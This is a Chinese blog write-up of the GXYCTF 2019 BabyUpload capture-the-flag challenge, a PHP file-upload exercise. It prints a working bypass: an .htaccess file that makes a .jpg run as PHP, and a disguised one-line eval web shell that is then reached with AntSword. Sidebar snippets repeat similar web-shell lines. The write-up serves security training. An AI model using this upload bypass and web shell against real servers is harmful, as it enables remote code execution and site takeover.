[GXYCTF 2019]BabyUpload

最新推荐文章于 2024-04-24 19:08:47 发布
最新推荐文章于 2024-04-24 19:08:47 发布
阅读量670 收藏 10
点赞数 9
分类专栏: ctf 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73612768/article/details/135378786
版权

[GXYCTF 2019]BabyUpload wp

页面内容:

在这里插入图片描述

在上传文件时,发现 png 后缀名都被过滤了,只能用 jpg ;

此外过滤了 PHP 文件的标志:<?php ,<? ;

后缀名不能带有 ph ;

fuzz 了一下,发现后缀名 .htaccess 没被过滤。

后面的我没测了,直接给出我用的文件内容:

htaccess.jpg 文件内容:
<FilesMatch "eval.jpg">
SetHandler application/x-httpd-php
AddHandler php5-script .jpg
</FilesMatch>

设置同一目录下的 eval.jpg 被当作 PHP 代码执行。

eval.jpg 文件内容:
BM
<script language="php">@eval($_POST['shell']);</script>

关于这段代码的解释可以去看:

[极客大挑战 2019]Upload wp

解题步骤:

上传顺序随意,htaccess.jpg 文件在上传时要抓包,将文件名改为 .htaccess(必须一模一样):

在这里插入图片描述

eval.jpg 文件直接上传。

路径中的那一大串字符看似随机,其实每个文件都是一样的,目录不变,这样 .htaccess 才会发挥作用。

直接用蚁剑去连 eval.jpg 文件的路径,flag 在根目录下:

在这里插入图片描述

妙尽璇机
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 877
说明是黑名单,且对上传的类型也做了校验。说明对上传的内容也做了校验。4. 修改上传内容绕过校验。
[GXYCTF2019]BabyUpload
weixin_43152809的博客
11-17 3413
打开界面是一个文件上传 尝试一下 首先上传的是php文件 但是显示 后缀名不能有ph! emmm,看来是对php文件做了限制 随后习惯性上传png 返回 上传类型也太露骨了吧! emmm,随后又尝试了.htaccess和.user.ini文件都与上方显示相同 正当我一筹莫展之际 发现了题目页面的网址 我突然觉得我有希望了! 随后果然发现了题目的源码 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" conten
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1568
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
### CTF-WEB[GXYCTF 2019]BabyUpload分析 #### 知识点一:Web安全中的文件上传漏洞 在本题目中,我们面对的是一个典型的Web安全问题——文件上传漏洞。文件上传漏洞是Web应用程序中最常见的安全漏洞之一,它允许...
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
C#做的超市管理系统。
11-17
《C#实现的超市管理系统详解》 在信息技术日益发达的今天,各类管理系统已经渗透到各行各业,其中超市管理系统作为零售业的重要组成部分,对于提升运营效率、优化库存管理具有重要作用。本系统采用C#编程语言和SQL ...
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 605
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
[GXYCTF2019]BabyUpload1
qq_64201116的博客
05-14 2900
小小的文件上传,拿下!
[GXYCTF2019]BabyUpload(典型图片马基础绕过流程)
EC_Carrot的博客
11-05 2152
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! [GXYCTF2019]BabyUpload 这题坑了我一小会,我就在想这都能坑到我,真的是太年轻了(`-д-;)ゞ 试了一下gif,jpg用不了,png是可以的 上传php提示不能上传后缀名带ph的文件 再测试上传.htaccess文件 发现改type为image/jpeg能上传成功 到这里不难猜出是图片马getshell了 拿蚁剑连马拿fla
[GXYCTF2019]BabyUpload-BUUTF
最新发布
XiaoYeZhu_1314的博客
04-24 452
他过滤了<?,ph等。
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1897
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上传一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把传输的文件名改回1.pn
[gxyctf2019]babysqli
03-16
"babysqli" 是一个 SQL 注入的题目,通常用于漏洞挖掘和安全测试目的。它通常包含一个网页表单,该表单将用户输入的数据插入到 SQL 查询中,如果网站没有正确地过滤和验证用户输入,那么攻击者可能能够通过注入恶意 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值